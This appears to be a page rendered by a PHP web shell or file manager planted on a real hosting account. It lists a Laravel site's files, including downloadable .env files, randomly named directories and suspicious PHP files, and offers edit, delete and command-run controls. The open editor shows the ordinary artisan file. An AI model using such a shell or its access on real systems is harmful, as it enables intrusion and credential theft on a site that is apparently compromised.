/
home
/
techb158
/
ileadtechnology.com
/
/home/techb158/ileadtechnology.com
mkdir
upload
Name
Size
Mode
Actions
.well-known/
-
0755
rm
app/
-
0755
rm
bg1evkf/
-
0755
rm
bootstrap/
-
0755
rm
config/
-
0755
rm
database/
-
0755
rm
eClass_BackUp/
-
0755
rm
ejcaymk/
-
0755
rm
gsknjpe/
-
0755
rm
igeubqm/
-
0755
rm
mganbru/
-
0755
rm
mrwzqsv/
-
0755
rm
nxpgajm/
-
0755
rm
p1shimw/
-
0755
rm
public/
-
0755
rm
resources/
-
0755
rm
routes/
-
0755
rm
SSM/
-
0755
rm
storage/
-
0755
rm
tests/
-
0755
rm
usdohpa/
-
0755
rm
vendor/
-
0755
rm
wdiohnv/
-
0755
rm
xmvrbes/
-
0755
rm
zcbhisn/
-
0755
rm
.editorconfig
213
0644
edit
dl
rm
.env
1836
0644
edit
dl
rm
.env-1
2229
0644
edit
dl
rm
.env.example
655
0644
edit
dl
rm
.env_bak
1836
0644
edit
dl
rm
.gitattributes
111
0644
edit
dl
rm
.gitignore
151
0644
edit
dl
rm
.htaccess
480
0644
edit
dl
rm
.htaccess_bak
2097
0644
edit
dl
rm
.htaccess_Old
1559
0644
edit
dl
rm
admin.php
0
0644
edit
dl
rm
artisan
1686
0644
edit
dl
rm
composer.json
3643
0644
edit
dl
rm
composer.lock
405675
0644
edit
dl
rm
etavcpwr.php
7317
0644
edit
dl
rm
index.php
0
0644
edit
dl
rm
package.json
1125
0644
edit
dl
rm
php.ini
660
0644
edit
dl
rm
phpunit.xml
1138
0644
edit
dl
rm
robots.txt
28
0644
edit
dl
rm
server.php
563
0644
edit
dl
rm
webpack.mix.js
537
0644
edit
dl
rm
wp-cron-zyhg.php
1659
0644
edit
dl
rm
yarn.lock
201791
0644
edit
dl
rm
Edit:
/home/techb158/ileadtechnology.com/artisan
(1686B)
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Save
cmd:
run